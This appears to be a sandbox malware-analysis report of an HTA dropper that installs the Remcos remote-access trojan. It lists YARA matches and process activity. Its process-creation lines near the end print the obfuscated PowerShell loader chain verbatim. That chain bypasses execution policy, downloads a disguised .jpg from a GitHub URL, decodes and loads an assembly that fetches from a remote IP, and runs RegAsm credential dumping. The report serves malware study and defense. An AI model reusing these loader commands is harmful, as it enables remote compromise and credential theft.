                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0044DA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00427AD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0041DBF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00427C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00437DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00435EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_0043DEED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_00426E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_10017194
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 11_2_1000B5C1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044B040
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043610D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00447310
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044A490
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0040755A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0043C560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044B610
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044D6C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004476F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044B870
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044081D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00414957
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_004079EE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00407AEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044AA80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00412AA9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00404B74
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00404B03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0044BBD8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00404BE5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00404C76
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00415CFE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00416D72
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00446D30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00446D8B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_00406E8F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00405038
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041208C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004050A9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040511A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043C13A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004051AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00449300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0040D322
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0044A4F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043A5AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00413631
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00446690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0044A730
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004398D8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_004498E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0044A886
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0043DA09
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00438D5E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00449ED0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_0041FE83
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 14_2_00430F54
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004050C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004014AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00405133
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004051A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00401246
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_0040CA46
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00405235
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_004032C8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00401689
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00402F60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004169A7 appears 87 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 004165FF appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434801 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00422297 appears 42 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00434E70 appears 54 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00402093 appears 50 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 0044DB70 appears 41 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00401E65 appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00444B5A appears 37 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00413025 appears 79 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: String function: 00416760 appears 69 times
                      Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 9.2.powershell.exe.5b84b60.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 9.2.powershell.exe.5b84b60.0.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0000000B.00000002.4469156040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000009.00000002.2257703672.0000000005519000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000009.00000002.2257703672.000000000571D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 3840, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                      Source: Process Memory Space: powershell.exe PID: 4720, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                      Source: Process Memory Space: RegAsm.exe PID: 3092, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@27/23@4/4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,12_2_004182CE
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,11_2_0041798D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,15_2_00410DE1
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,12_2_00418758
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,11_2_0040F4AF
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,11_2_0041B539
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,11_2_0041AADB
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\seethebestpricewithgoodcookiesme[1].tiffJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I89M3S
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4148:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2672:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_meuczva5.5dy.ps1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformation
                      Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.2242019579.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: RegAsm.exe, 0000000C.00000002.2253606777.0000000002ACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.2250307830.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: na.htaVirustotal: Detection: 26%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\na.hta"
Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'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'+[ChAr]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\p44lx5ym\p44lx5ym.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC057.tmp" "c:\Users\user\AppData\Local\Temp\p44lx5ym\CSC1BDFD807A6FD4EDC87F258A79D1E57AA.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestpricewithgoodcookiesm.vbS"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\icthiyu"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\swyajqfles"
